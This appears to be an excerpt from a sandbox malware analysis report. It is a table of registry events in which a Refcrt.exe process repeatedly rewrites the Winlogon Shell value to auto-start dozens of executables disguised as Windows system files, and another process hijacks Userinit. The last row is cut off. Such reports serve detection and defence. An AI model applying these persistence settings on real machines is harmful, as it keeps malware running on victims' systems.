| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\winNet\\Idle.exe\", \"C:\\Windows\\Prefetch\\ReadyBoot\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" | C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", 